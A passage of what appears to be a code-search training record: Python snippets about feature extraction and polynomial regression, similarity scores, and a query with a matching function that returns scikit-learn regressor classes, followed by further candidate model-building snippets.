example_features:\n\t\t\tprint(k)\n\t\t\tprint(example_features[k].shape)\n\t\tfor k in context_features:\n\t\t\tprint(k)\n\t\t\tprint(context_features[k].shape)\n\t\treturn context_features, example_features", "def get_poly_fun(fun: XFunction, x: float, degree: int) -> Poly:\n params = get_poly_params(fun, x, degree)\n return Poly(params)", "def get_polyfit_function(self):\n N = len(self.coefficients)\n return lambda x: np.dot( self.get_poly(x).T , self.coefficients.reshape(N, 1) )", "def forward(self, x):\n x = self.features(x)\n return x", "def add_poly_features(data, columns, degree=2):\n\n if degree != 2:\n print('Only works w/2 degrees right now...')\n return\n\n for col in columns:\n new_col = col + '_poly' + str(degree)\n data[new_col] = np.nan\n data[[col, new_col]] = poly(data[col], degree=degree)\n\n return data", "def get_poly_coeff(self, independent, dependent):\n\n try:\n x = self.df_input[[independent]]\n y = self.df_input[[dependent]]\n\n poly = PolynomialFeatures(degree = 2)\n x_poly = poly.fit_transform(x) \n\n model = LinearRegression()\n model.fit(x_poly, y)\n return model.coef_\n except Exception as e:\n print(e)", "def construct_polynomial_approx(degree, weights):\n # here is a function that is created on the fly from the input feature\n # mapping and weights\n def prediction_function(xs):\n expanded_xs = np.matrix(expand_to_monomials(xs, degree))\n ys = expanded_xs*np.matrix(weights).reshape((len(weights),1))\n return np.array(ys).flatten()\n # we return the function reference (handle) itself. This can be used like\n # any other function\n return prediction_function", "def transform(self, X):\n\n # Calculate and store in features, replacing any potential non-finites (not sure needed)\n if self.split is None:\n features = _trial(self, self.study.best_trial, X)\n else:\n features = _trial(self, self.study.trials[self.study.top_trial], X)\n return features", "def transform(self, X: Tensor) -> Tensor:\n return X[..., self.feature_indices]", "def multiply(self, P):\n if self.getDegree() == -1 or P.getDegree() == -1:\n return Polynomial([])\n \n coefs_of_product = [0] * (self.getDegree() + P.getDegree() + 1)\n for i in range(self.getDegree() + 1):\n for j in range(P.getDegree() + 1):\n coefs_of_product[i + j] += self.__coefficients[i] * P.__coefficients[j]\n return Polynomial(coefs_of_product)", "def create_feature(example):\n input_ids, label_ids = encode_fn(\n example['tokens'], example['labels'])\n\n features = {\n 'input_ids': int64_feature(input_ids),\n 'label_ids': int64_feature(label_ids)\n }\n\n return features", "def get_pipeline(features, to_matrix=True):\n feature_names = []\n for feature in features:\n feature_names += feature[1].FEATS\n if to_matrix:\n return Pipeline(features + [('transform', ToMatrix(features=feature_names)), ('norm', MinMaxScaler())])\n else:\n return Pipeline(features)", "def generate_polynomial():\n degree = numpy.random.choice(range(3, 7))\n x = numpy.linspace(-10, 10, 1000)\n coefficients = numpy.random.chisquare(3, size=degree) + 1\n coefficients *= numpy.random.choice([-1, 1], size=coefficients.shape)\n coefficients *= 0.5\n y = numpy.polyval(coefficients, x)\n add_noise(y, 0.1)\n return x, y", "def zzX_from_poly(f):\n if f.is_univariate:\n return zzx_from_poly(f)\n else:\n return zzX_from_dict(dict(zip(f.monoms, f.coeffs)), len(f.symbols))", "def extract_features(input_feature_map, points=conv43Points):\n arr = []\n for y,x in points:\n arr.append(input_feature_map[:,y,x,:])\n return tf.stack(arr, axis=1, name=\"extracted_features\"), len(points)", "def transform(self, Xnew):\n\n ProjXnew = [X.dot(self.W) for X in Xnew]\n return ProjXnew", "def features(x):\n # We need to contract last axis of x with first of W - do this with\n # tensordot. The result has shape:\n # (?, ?, num_random_features)\n return jnp.sqrt(2 / num_random_features) * jnp.cos(\n jnp.sqrt(2 / gamma) * jnp.tensordot(x, w, axes=1) + b)", "def poly_features(frames, sample_rate, *, kwargs={}):\n l = []\n for frame in frames:\n l.append(\n np.mean(\n librosa.feature.poly_features(\n y=frame,\n sr=sample_rate,\n **kwargs\n ).T, axis=0\n )\n )\n return np.array(l)", "def pipeline(self):\n\n transformers = []\n\n custom = self.CustomFeature()\n #transformers.append(('custom', custom))\n n_features = int(self.n_features/2)\n\n #kbest = SelectKBest(score_func=chi2, k=n_features)\n #transformers.append(('kbest', kbest))\n\n # pca = PCA(n_components=n_features, svd_solver='randomized', whiten=True)\n # transformers.append(('pca', pca))\n\n if self.definer.problem_type == 'classification':\n extraTC = SelectFromModel(ExtraTreesClassifier(criterion='entropy'))\n else:\n extraTC = SelectFromModel(ExtraTreesRegressor())\n\n transformers.append(('extraTC', extraTC))\n\n #scaler = StandardScaler()\n #transformers.append(('scaler', scaler))\n #binarizer = Binarizer()\n return FeatureUnion(transformers)", "def polydecode(ctx, inputfile, output, x):\n with rio.open(inputfile) as src:\n metaprof = src.profile.copy()\n data = src.read()\n\n depth, rows, cols = data.shape\n\n depth -= 1\n\n out = (\n np.sum(\n np.dstack(\n [p * x ** abs(depth - d) for p, d in zip(data, range(depth))]\n ),\n axis=2,\n )\n + data[-1]\n ).astype(np.float32)\n\n metaprof.update(dtype=np.float32, count=1)\n\n with rio.open(output, \"w\", **metaprof) as dst:\n dst.write(out, 1)", "def build_poly(tx, degree) :\n shape = tx.shape\n poly = np.zeros((shape[0], shape[1] * degree))\n poly[:,:shape[1]] = tx\n for deg in range(2, degree + 1) :\n for j in range(0, shape[1]) :\n poly[:, shape[1] * (deg - 1) + j] = tx[:,j] ** deg\n return poly", "def build_feature_transform():\n\n # These features can be parsed as numeric.\n numeric = HEADER.as_feature_indices(\n [\"review_count\", \"lat\", \"lng\", \"lat2\", \"lng2\"]\n )\n\n # These features contain a relatively small number of unique items.\n categorical = HEADER.as_feature_indices(\n [\"distance\", \"price_level\", \"review_count\", \"Sp1\", \"type\"]\n )\n\n # These features can be parsed as natural language.\n text = HEADER.as_feature_indices(\n [\n \"slug\", \"menu\", \"slug.1\", \"categories\", \"name\", \"url\", \"homeurl\",\n \"resource_id1\", \"resource_id2\"\n ]\n )\n\n numeric_processors = Pipeline(steps=[(\"robustimputer\", RobustImputer())])\n\n categorical_processors = Pipeline(\n steps=[\n (\"thresholdonehotencoder\", ThresholdOneHotEncoder(threshold=162))\n ]\n )\n\n text_processors = Pipeline(\n steps=[\n (\n \"multicolumntfidfvectorizer\",\n MultiColumnTfidfVectorizer(\n max_df=0.9977,\n min_df=0.0003137465824032988,\n analyzer=\"word\",\n max_features=10000\n )\n )\n ]\n )\n\n column_transformer = ColumnTransformer(\n transformers=[\n (\"numeric_processing\", numeric_processors, numeric\n ), (\"categorical_processing\", categorical_processors,\n categorical), (\"text_processing\", text_processors, text)\n ]\n )\n\n return Pipeline(\n steps=[\n (\"column_transformer\",\n column_transformer), (\"robustpca\", RobustPCA(n_components=88)),\n (\"robuststandardscaler\", RobustStandardScaler())\n ]\n )", "def extract_features(X):\n X = X.drop(\"PassengerId\", axis=1)\n X = X.drop(\"Ticket\", axis=1)\n X = X.drop(\"Cabin\", axis=1)\n \n # Adding polynomial features\n X[\"Age2\"] = X[\"Age\"] ** 2\n #X[\"Fare2\"] = X[\"Fare\"] ** 2\n #X[\"Pclass2\"] = X[\"Pclass\"] ** 2\n\n \n male_titles = set([\"Mr\", \"Don\", \"Sir\"])\n female_titles = set([\"Miss\", \"Ms\", \"Mrs\", \"Mme\", \"Mdm\", \"Lady\"])\n professionals = set([\"Dr\", \"Rev\", \"Master\"])\n military = set([\"Col\", \"Major\", \"Capt\"])\n royalty = set([\"the Countess\", \"Jonkheer\"])\n \n names = X[\"Name\"]\n for i in range(len(names)): \n name_tokens = names[i].split(\", \") \n passenger_title = name_tokens[1].split(\".\")[0]\n if passenger_title in male_titles:\n names[i] = 1\n elif passenger_title in female_titles:\n names[i] = 2\n elif passenger_title in professionals:\n names[i] = 3\n #elif passenger_title in royalty:\n # names[i] = 4\n elif passenger_title in military:\n names[i] = 5\n else:\n names[i] = 6\n \n X[\"Name\"].update(names)\n \n # One hot encoding of categorical data\n X = pd.get_dummies(X) \n \n X.fillna(0, inplace=True)\n X['Fam'] = X['SibSp'] + X['Parch'] # assigned to a column\n return X", "def xx(x):\r\n return Feature(x, \"XX\")", "def zzX_eval(f, x):\n if hasattr(x, '__iter__'):\n return zzX_eval_list(f, x)\n\n if poly_univariate_p(f):\n return zzx_eval(f, x)\n\n if not x:\n return poly_TC(f)\n\n result = poly_LC(f)\n\n for coeff in f[1:]:\n result = zzX_mul_const(result, x)\n result = zzX_add(result, coeff)\n\n return result", "def construct_poly(data, power):\n return np.power(data, power)", "def get_poly_params(fun: XFunction, x: float, degree: int) -> tuple[float, ...]:\n if degree < 0:\n return (0.0,)\n rhs = np.array([fun(x, order=i) for i in range(degree, -1, -1)])\n mat = np.zeros((degree + 1, degree + 1))\n for i in range(degree + 1):\n for j in range(i + 1):\n mat[i, j] = factorial(degree - j) / factorial(i - j) * x ** (i - j)\n return tuple(np.linalg.solve(mat, rhs))", "def map_feature(X1, X2):\n X1 = np.atleast_1d(X1)\n X2 = np.atleast_1d(X2)\n degree = 6\n out = []\n for i in range(1, degree+1):\n for j in range(i + 1):\n out.append((X1**(i-j) * (X2**j)))\n return np.stack(out, axis=1)", "def extract_features(self, inputs):\n x = self.conv1(inputs)\n x = self.bn1(x)\n x = self.relu(x)\n x = self.maxpool(x)\n\n x = self.layer1(x)\n x = self.layer2(x)\n x = self.layer3(x)\n x = self.layer4(x)\n\n x = self.avgpool(x)\n return x", "def transform(self, X):\n featurizers = [self.featurizer1, self.featurizer2, self.featurizer3, self.featurizer4, self.featurizer5,\n self.featurizer6, self.featurizer7, self.featurizer8, self.featurizer9, self.featurizer10]\n fvs = []\n for datum in X:\n [fv] = [f(datum) for f in featurizers if f is not None]\n fvs.append(fv)\n return np.array(fvs).astype(float)", "def construct_target(trainSamples):\n feature_names = [\"click_bool\", \"booking_bool\",\"position\"]\n samples = trainSamples[feature_names].values\n def f(vec):\n x, y, z = vec\n return y + 0.2 * x\n return [f(vec) for vec in samples]", "def getFeatures(featureInput):\n featureList = []\n for defTerm,candidateSent in featureInput:\n tokens = nltk.word_tokenize(candidateSent)\n features = {}\n POScenter,POSleft,POSright = wordPOS(tokens,defTerm)\n features['Pos of first Article'] = posFirstArticle(tokens)\n## features['Num Punct Marks'] = numPunctuation(tokens)\n features['Subj words Predicate'] = subWordPerdicate(candidateSent,defTerm,tokens)\n features['Word before def term'] = wordBeforeDef(tokens,defTerm)\n features['POS centered word'] = POScenter\n features['POS left word'] = POSleft\n## features['POS right word'] = POSright \n featureList.append(features)\n return featureList", "def generate_models(x, y, degs):\n import numpy as np\n rslt = []\n for deg in degs:\n coefs = np.polyfit(x, y, deg)\n rslt.append(coefs)\n return rslt", "def generate_random_tropical_poly(max_degree, min_coefficient, max_coefficient):\n coefficients = []\n for d in range(0, random.randint(1, max_degree) + 1):\n coefficients.append(random.randint(min_coefficient, max_coefficient))\n return coefficients", "def get_model_feature(\n model,\n batch_x\n):\n features = model.get_feature(batch_x, training=False)\n return features", "def to_features(self):\n to_return = dict()\n\n to_return['bias'] = 1.0\n to_return['user:' + self.user] = 1.0\n to_return['format:' + self.format] = 1.0\n to_return['token:' + self.token.lower()] = 1.0\n\n to_return['part_of_speech:' + self.part_of_speech] = 1.0\n for morphological_feature in self.morphological_features:\n to_return['morphological_feature:' + morphological_feature] = 1.0\n to_return['dependency_label:' + self.dependency_label] = 1.0\n\n return to_return", "def transform(self, X):\n featurizers = [self.featurizer1, self.featurizer2, self.featurizer3, self.featurizer4, self.featurizer5,\n self.featurizer6, self.featurizer7, self.featurizer8, self.featurizer9, self.featurizer10]\n fvs = []\n for datum in X:\n fv = [f(datum) for f in featurizers if f is not None]\n fvs.append(fv)\n return np.array(fvs).astype(float)", "def get_predicts(x_matrix, model, poly, scale, dummy_idx):\n x_matrix = np.array(x_matrix)\n\n # adding polynomial features and/or scaling before prediction\n temp_list = split_poly_scale_join([x_matrix], dummy_idx, poly, scale)\n x_matrix = temp_list[0]\n\n return model.predict(x_matrix)", "def preprocess_features(features):\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features).tocoo()\n return sparse_to_tensor(features)", "def poly_regression_cubic(X, Y, Xs_test, Ys_test):\n \n poly = PolynomialFeatures(degree = 3)\n X3 = poly.fit_transform(X)[:,1:]\n X3_test = []\n for X_test in Xs_test:\n X3_test.append(poly.fit_transform(X_test)[:,1:])\n mses = linear_regression(X3, Y, X3_test, Ys_test)\n return mses", "def poly(x, degree=2):\n x = np.array(x)\n X_trans = np.transpose(np.vstack((x**k for k in range(degree + 1))))\n return np.linalg.qr(X_trans)[0][:, 1:]", "def preprocess_features(features):\r\n rowsum = np.array(features.sum(1),dtype='float')\r\n r_inv = np.power(rowsum, -1).flatten()\r\n r_inv[np.isinf(r_inv)] = 0.\r\n r_mat_inv = sp.diags(r_inv)\r\n features = r_mat_inv.dot(features)\r\n # return sparse_to_tuple(features)\r\n return features\r\n # print(features)\r\n # rowsum = np.array(features.sum(1),dtype='float')\r\n #\r\n # r_inv = np.power(rowsum, -1).flatten()\r\n # r_inv[np.isinf(r_inv)] = 0.\r\n # r_mat_inv = np.diag(r_inv)\r\n # features = r_mat_inv.dot(features)\r\n # # return sparse_to_tuple(features)\r\n # return features\r", "def compute_features(self, X):\n F = self.feature_extractor(X)\n if self.with_dropout:\n F = self.dropout(F)\n F = F[:, None].expand(-1, self.n_primitives, -1)\n F = torch.cat([\n F,\n self.primitive_embedding[None].expand_as(F)\n ], dim=-1)\n\n B = F.shape[0]\n M = self.n_primitives\n D = 2*self.feature_extractor.feature_size\n\n assert F.shape == (B, M, D)\n return F", "def getXy_by_features(year, features, sex, age = None):\r\n print 'getXy_by_features(year=%d,features=%s,sex=%s,age=%s)' % (year, features, sex, age)\r\n \r\n X,y,keys = getXy_by_features_(year, features)\r\n X,y,keys = getXy_by_sex_age(X,y,keys, sex, age)\r\n X,y = normalize(X, y)\r\n\r\n return X,y,keys", "def get_coeffs(self):\n\n return self._coeff_to_dict()", "def generateFeatures(self, data):\n pass", "def get_training(feature_path): \n features = np.loadtxt(feature_path)\n feature_size = features.shape[1] -1 \n features_in = features[:,0:feature_size]\n features_out = features[:,-1]\n #features_out = np.array(map(lambda x: x if x else 0, features_out_unnorm))\n return features_in, features_out", "def preprocess_features(features):\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features.todense()", "def feature_mapping(x, y, power, as_ndarray=False):\n # data = {}\n # # inclusive\n # for i in np.arange(power + 1):\n # for p in np.arange(i + 1):\n # data[\"f{}{}\".format(i - p, p)] = np.power(x, i - p) * np.power(y, p)\n\n data = {\"f{}{}\".format(i - p, p): np.power(x, i - p) * np.power(y, p)\n for i in np.arange(power + 1)\n for p in np.arange(i + 1)\n }\n\n if as_ndarray:\n return pd.DataFrame(data).as_matrix()\n else:\n return pd.DataFrame(data)", "def zzX_to_poly(f, *symbols):\n from sympy.polys import Poly\n\n terms = {}\n\n for monom, coeff in zzX_to_dict(f).iteritems():\n terms[monom] = Integer(int(coeff))\n\n return Poly(terms, *symbols)", "def preprocess_feature(df):", "def preprocess_features(features):\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features.todense(), sparse_to_tuple(features)", "def preprocess_features(features):\n rowsum = np.array(features.sum(1))\n r_inv = np.power(rowsum, -1).flatten()\n r_inv[np.isinf(r_inv)] = 0.\n r_mat_inv = sp.diags(r_inv)\n features = r_mat_inv.dot(features)\n return features.todense(), sparse_to_tuple(features)", "def preprocess_features(features):\r\n rowsum = np.array(features.sum(1))\r\n r_inv = np.power(rowsum, -1).flatten()\r\n r_inv[np.isinf(r_inv)] = 0.\r\n r_mat_inv = np.diag(r_inv)\r\n features = r_mat_inv.dot(features)\r\n return features", "def map_feature(X1, X2):\n degree = 6\n out = np.ones(X1.shape)\n \n for i in range(1, degree + 1):\n for j in range(0, i + 1):\n out = np.concatenate((out, np.power(X1, (i - j)) * np.power(X2, j)), axis=-1)\n\n return out", "def getFeatureContributions(self, clf, features, ser_X):\n labels = list(set(features).intersection(ser_X.index))\n ser_X_sub = ser_X.loc[labels]\n df_coef = pd.DataFrame(clf.coef_, columns=features)\n df_X = pd.concat([ser_X_sub for _ in range(len(clf.coef_))], axis=1)\n df_X = df_X.T\n df_X.index = df_coef.index\n df_result = df_X.multiply(df_coef)\n return df_result", "def _coeff_to_df(self):\n dct = self._coeff_to_dict()\n\n return (\n pd.DataFrame(data=dct.items(), columns=[\"feature\", \"coeff\"])\n .sort_values(by=\"coeff\", ascending=False)\n .reset_index(drop=True)\n )", "def coefficients(self):\r\n return self.coef_['x']", "def transform(self, X):\n for i,f in enumerate(self.features):\n X[f] = self._label_encoders_[i].transform(X[f])\n return X", "def feature_transform(feature, crs_out, crs_in={'init': 'epsg:4326'}):\n p_in = Proj(crs_in)\n p_out = Proj(crs_out)\n feature_out = copy.deepcopy(feature)\n new_coords = []\n if feature['geometry']['type'] == 'Polygon':\n # Probably also work for multypolygons\n for ring in feature['geometry']['coordinates']:\n x2, y2 = transform(p_in, p_out, *zip(*ring))\n new_coords.append(zip(x2, y2))\n feature_out['geometry']['coordinates'] = new_coords\n elif feature['geometry']['type'] == 'Point':\n # Probably doesn't work for multipoints\n new_coords = transform(p_in, p_out, *feature['geometry']['coordinates'])\n feature_out['geometry']['coordinates'] = new_coords\n else:\n raise ValueError('Unsuported feature type')\n return feature_out", "def _poly2view(X):\n X = np.asarray([np.power(x, 2) for x in X])\n return X", "def get_list_features(feature):\n result = np.array([])\n result = np.append(result,feature.mfcc)\n result = np.append(result,feature.d_mfcc)\n result = np.append(result,feature.lpc)\n result = np.append(result,feature.d_lpc)\n result = np.append(result,feature.zc_rate)\n result = np.append(result,feature.d_zc_rate)\n result = np.append(result,feature.spec_centroid)\n result = np.append(result,feature.d_spec_centroid)\n return result", "def preprocess_features(features):\r\n rowsum = np.array(features.sum(1))\r\n r_inv = np.power(rowsum, -1).flatten()\r\n r_inv[np.isinf(r_inv)] = 0.\r\n r_mat_inv = sp.diags(r_inv)\r\n features = r_mat_inv.dot(features)\r\n return sparse_to_tuple(features)", "def transform(self, X, verbose = False):\n if self.verbose:\n t = Timer()\n X = features_colorspace(X, self.params[\"colorspace\"])\n feature_list = list()\n feature_list.append(\n features_spatial(X, self.params[\"spatial_size\"], self.params[\"spatial_channels\"]))\n feature_list.append(\n features_hist(X, self.params[\"hist_bins\"], self.params[\"hist_channels\"]))\n feature_list.append(\n features_hog(X, self.params[\"hog_block_norm\"], self.params[\"hog_transform_sqrt\"], self.params[\"hog_channels\"]))\n features = np.concatenate(feature_list, axis = 1)\n if self.verbose:\n print(\"Number of features: {}\".format(features.shape[1]))\n print(\"Time to transform : {:.4e}\".format(t.tock()/X.shape[0]))\n return features", "def __call__(self, *args, **kwargs):\n self.features = dict((k, v()) for k, v in self.features.items())\n return self.features", "def extract_vectors(row):\n # tuple(x for x in row if x not in ['pcaFeatures'])+\n return tuple(float(x) for x in row.pcaFeatures.values)", "def predict(self, X):\n # TODO\n \n # Perform polynomial expansion on X \n X = self.polyfeatures(X, self.degree)\n \n n = len(X)\n\n # add 1s column\n X_ = np.c_[np.ones([n, 1]), X]\n \n n, d = X_.shape\n d = d-1 # remove 1 for the extra column of ones we added to get the original num features\n \n # Standardize all columns by the same standardization of from the fit \n # function \n for j in range(1,d+1): \n X_[:,[j]] = (X_[:,[j]]-self.mus[j-1])/self.stds[j-1]\n \n # predict\n return X_.dot(self.theta)", "def polynomial_expansion(dataframe,columns=[], degree=3,frame_type='spark',only_return_polys=False,id_col='ID'):\n if(degree <2):\n raise Exception('Degree must be >= 2. Got: '+str(degree))\n if frame_type == 'spark':\n from pyspark.sql.functions import pow, col\n\n df = dataframe\n if only_return_polys:\n df = df.select(id_col, columns)\n\n for column in columns:\n for i in range(2,degree+1):\n df = df.withColumn(column+'_'+'^'+str(i), pow(col(column), i) )\n return df\n else:\n pass", "def create(pdef):\n from sklearn.pipeline import Pipeline\n return [Pipeline(p) for p in pdef]", "def feature_forward(self, x):\n raise NotImplementedError" ]
[ "0.7088703", "0.69679934", "0.66370046", "0.6578305", "0.6512583", "0.6453376", "0.63881963", "0.6234599", "0.6210643", "0.6198964", "0.61715096", "0.61595196", "0.6012623", "0.60067403", "0.595723", "0.5934394", "0.58879584", "0.5873344", "0.582992", "0.5797094", "0.57733417", "0.5773121", "0.57382864", "0.5718979", "0.57173944", "0.57056445", "0.5676183", "0.56503546", "0.5626869", "0.5606366", "0.5589378", "0.5581953", "0.5554252", "0.55068696", "0.54837865", "0.54688376", "0.54651403", "0.5462564", "0.5441759", "0.5441238", "0.54367447", "0.54268754", "0.54249316", "0.54048586", "0.5387218", "0.53680503", "0.5363701", "0.5359736", "0.5353863", "0.5350062", "0.5349721", "0.53459984", "0.53412944", "0.5333009", "0.5327628", "0.5324549", "0.53202206", "0.53177947", "0.5296694", "0.5295481", "0.5292716", "0.52917796", "0.5287281", "0.5276046", "0.5273302", "0.5272569", "0.5271748", "0.5270257", "0.52557474", "0.5246424", "0.5244619", "0.52421284", "0.52399", "0.5232967", "0.5230174", "0.52292365", "0.5220613", "0.520819", "0.52074116", "0.5203844", "0.5200246", "0.52000266", "0.52000266", "0.51991683", "0.5197924", "0.5191357", "0.51851004", "0.5179172", "0.5175812", "0.5169656", "0.5167971", "0.5166184", "0.51539546", "0.5142615", "0.51410943", "0.5140609", "0.5134531", "0.5134231", "0.5133987", "0.51264566" ]
0.77433574
0
return a scikitlearn model class, and the required arguments
def get_model_class(class_name, kwargs={}): # , Perceptron, PassiveAggressiveRegressor # , NuSVR, LinearSVR if class_name == 'LinearRegression': from sklearn.linear_model import LinearRegression return LinearRegression(**kwargs) if class_name == 'SGDRegressor': from sklearn.linear_model import SGDRegressor return SGDRegressor(**kwargs) if class_name == 'SVR': from sklearn.svm import SVR return SVR(**kwargs) if class_name == 'DecisionTreeRegressor': from sklearn.tree import DecisionTreeRegressor return DecisionTreeRegressor(**kwargs) if class_name == 'ExtraTreesRegressor': from sklearn.ensemble import ExtraTreesRegressor return ExtraTreesRegressor(**kwargs) if class_name == 'KNeighborsRegressor': from sklearn.neighbors import KNeighborsRegressor return KNeighborsRegressor(**kwargs) if class_name == 'MLPRegressor': from sklearn.neural_network import MLPRegressor return MLPRegressor(**kwargs) raise Exception("Unknown Model class")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def __init__(self):\n self.name = \"Schaffer\"\n objectives = [o_sh_1, o_sh_2]\n decisions = [Decision(-10 ** 5, 10 ** 5)]\n Model.__init__(self, objectives, None, decisions)", "def modelClass(self):\n raise NotImplementedError", "def __init__(self):\n self.name = \"Kursawe\"\n objectives = [o_ku_1, o_ku_2]\n decisions = [Decision(-5, 5), Decision(-5, 5), Decision(-5, 5)]\n Model.__init__(self, objectives, None, decisions)", "def build_model():", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def get_model(*args):\n return Model()", "def convert_to_model(self, *args):", "def MakeModel(self):\n pass", "def __init__(self):\n self.name = \"Osyczka\"\n objectives = [ob_os_1, ob_os_2]\n constraints = [con_os_1, con_os_2, con_os_3, con_os_4, con_os_5, con_os_6]\n decisions = [Decision(0, 10), Decision(0, 10), Decision(1, 5), Decision(0, 6), Decision(1, 5), Decision(0, 10)]\n Model.__init__(self, objectives, constraints, decisions)", "def create_model():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('--DISC_LR', type=float, default=1e-4)\r\n parser.add_argument('--GEN_LR', type=float, default=1e-3)\r\n parser.add_argument('--GEN_BETA1', type=float, default=0.9)\r\n parser.add_argument('--GEN_BETA2', type=float, default=0.999)\r\n parser.add_argument('--IMAGE_SIZE', type=int, default=None)\r\n parser.add_argument('--QUES_SIZE', type=int, default=None)\r\n parser.add_argument('--QUES_EMBED_SIZE', type=int, default=2048)\r\n parser.add_argument('--WORD_EMBED_SIZE', type=int, default=512)\r\n parser.add_argument('--VOCAB_SIZE', type=int, default=1004)\r\n args, task_args = parser.parse_known_args()\r\n override_if_not_in_args('--max_steps', '1000', task_args)\r\n override_if_not_in_args('--batch_size', '64', task_args)\r\n override_if_not_in_args('--eval_set_size', '370', task_args)\r\n override_if_not_in_args('--eval_interval_secs', '2', task_args)\r\n override_if_not_in_args('--log_interval_secs', '2', task_args)\r\n override_if_not_in_args('--min_train_eval_rate', '2', task_args)\r\n\r\n return Model(args.DISC_LR, args.GEN_LR, args.GEN_BETA1, args.GEN_BETA2,\r\n args.IMAGE_SIZE, args.QUES_EMBED_SIZE, args.WORD_EMBED_SIZE,\r\n args.QUES_SIZE, args.VOCAB_SIZE), task_args", "def build_model_fn(self):", "def make_model():\n m = model_class(*argv[2:-1])\n modelobj[\"model\"] = m", "def build_model(self, **kwargs):\n raise NotImplementedError()", "def __init__(self, *args):\n this = _libsbml.new_ModelCreator(*args)\n try: self.this.append(this)\n except: self.this = this", "def model(self) -> Type[Model]:", "def __init__(self, model = None, cso = None, fast_classification = True, paper = None):\n self.cso = cso #Stores the CSO Ontology\n self.paper = paper #Paper to analyse\n self.model = model #contains the cached model\n self.min_similarity = 0.90 #Initialises the min_similarity\n self.fast_classification = fast_classification # if will use the full model or not\n self.explanation = dict()", "def build_model(train_inputs,train_labels,model_params,model_mode='classification',\n model_type='naive_bayes'):\n if model_mode == \"classification\":\n if model_type == \"naive_bayes\":\n model = GaussianNB()\n if model_type == \"knn\":\n model = KNeighborsClassifier(n_neighbors=50)\n if model_type == \"svm\":\n model = SVC(kernel='poly', degree =27, coef0 =1, C=5)\n if model_type == \"decision_tree\":\n model = DecisionTreeClassifier(min_samples_split=45,min_samples_leaf=45,criterion=\"gini\")\n #model = RandomForestClassifier(n_estimators=500, n_jobs=-1)\n\n if model_mode == \"regression\":\n if model_type == \"knn\":\n model = KNeighborsRegressor()\n if model_type == \"svm\":\n model = SVR()\n if model_type == \"decision_tree\":\n model = DecisionTreeRegressor()\n\n\n model.fit(train_inputs, train_labels)\n # for name, score in zip(train_inputs.columns,model.feature_importances_):\n # print(name, score)\n\n return model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def __init__(self, model):\n self.model = model", "def make_stax_model(self):", "def model() -> Model:\n return Model()", "def create_model(self, **inputs):\n raise NotImplementedError('This method has to be overwritten.')", "def create_model(self):\r\n model = self.model_fn(self.flags)\r\n print(model)\r\n return model", "def build_model(self):\n raise NotImplementedError", "def create_model(self):\n pass", "def create_model(self):\n pass", "def _build_model(self):\n raise NotImplementedError()", "def __init__(self, *args):\n this = _libsbml.new_Model(*args)\n try: self.this.append(this)\n except: self.this = this", "def model(self) -> str:\n ...", "def __init__(self, model: str, **kwargs):\n super().__init__(model=model)", "def __init__(self, model):\n\t\tself.model = model", "def build_model(self):\n pass", "def build_model(self):\n pass", "def build_model(cls, args):\n base_architecture(args) \n return StyleGANGeneratorPretrain(args)", "def __init__(self, model: object):\n self.model = model", "def createModel(self, sid=\"\"):\n return _libsbml.SBMLDocument_createModel(self, sid)", "def __init__(self, x_train, model):\n self.x_train = x_train\n self.model = model", "def get_model(self):\n raise NotImplementedError(\n \"You must provide a 'get_model' method for the '%r' index.\" % self\n )", "def create_model():\n\n class Net(nn.Cell):\n def construct(self, x, y):\n return x\n\n net = Net()\n model_simple = Model(net)\n\n return model_simple", "def gen_model():\n\n\tmodel = skipthoughts.load_model()\n\treturn model", "def get_result_model(cls):\n raise NotImplementedError()", "def __init__(self, **kwargs):\n super(Model, self).__init__(**kwargs)", "def build_model(cls, args, task):\n raise NotImplementedError(\"Model must implement the build_model method\")", "def create_model(instance):\n name, nitems, sets = instance\n model = grb.Model(name)\n\n # One variable for each set. Also remember which sets cover each item.\n covered_by = [[] for i in range(nitems)]\n vars = []\n for i, set in enumerate(sets):\n cost, covers = set\n vars.append(model.addVar(obj=cost, vtype=grb.GRB.BINARY, name=\"s_{0}\".format(i)))\n\n for item in covers:\n covered_by[item].append(vars[i])\n model.update()\n\n # Constraint: Each item covered at least once.\n for item in range(nitems):\n model.addConstr(grb.quicksum(covered_by[item]) >= 1)\n\n # We want to minimize. Objective coefficients already fixed during variable creation.\n model.setAttr(\"ModelSense\", grb.GRB.MINIMIZE)\n\n # Tuning parameters derived from sc_330_0\n model.read(\"mip.prm\")\n\n model.setParam(\"Threads\", 3)\n model.setParam(\"MIPGap\", 0.001) # 0.1% usually suffices\n\n return model, vars", "def __init__(self, **kwargs):\n\n def paraChck(**kwargs):\n \"\"\"\n check and validate the keyword argument input\n \"\"\"\n import sys\n\n \n def_val = {\n 'x_train':None,\n 'y_train':None,\n 'x_test':None,\n 'y_test':None,\n 'channel':1,\n 'input_img_cols':72,\n 'input_img_rows':72,\n 'nb_classes':13,\n 'nb_epoch': 5,\n 'batch_size' : 16,\n 'dict_label' : None} # default parameteters value\n\n diff = set(kwargs.keys()) - set(def_val.keys())\n if diff:\n print(\"Invalid args:\",tuple(diff),file=sys.stderr)\n return\n\n def_val.update(kwargs)\n return def_val\n \n def_val = paraChck(**kwargs)\n\n class Bunch(object):\n def __init__(self, adict):\n self.__dict__.update(adict)\n \n self.x_train = def_val['x_train']\n self.y_train = def_val['y_train']\n self.x_test = def_val['x_test']\n self.y_test = def_val['y_test']\n self.channels = def_val['channel']\n self.input_img_rows = def_val['input_img_rows']\n self.input_img_cols = def_val['input_img_cols']\n self.nb_classes = def_val['nb_classes']\n self.plot_model = None\n self.model = None\n self.nb_epoch = def_val['nb_epoch']\n self.batch_size = def_val['batch_size']\n self.dict_label = def_val['dict_label']\n \n # default label dictionary if users do not provide\n values = ['label_' + 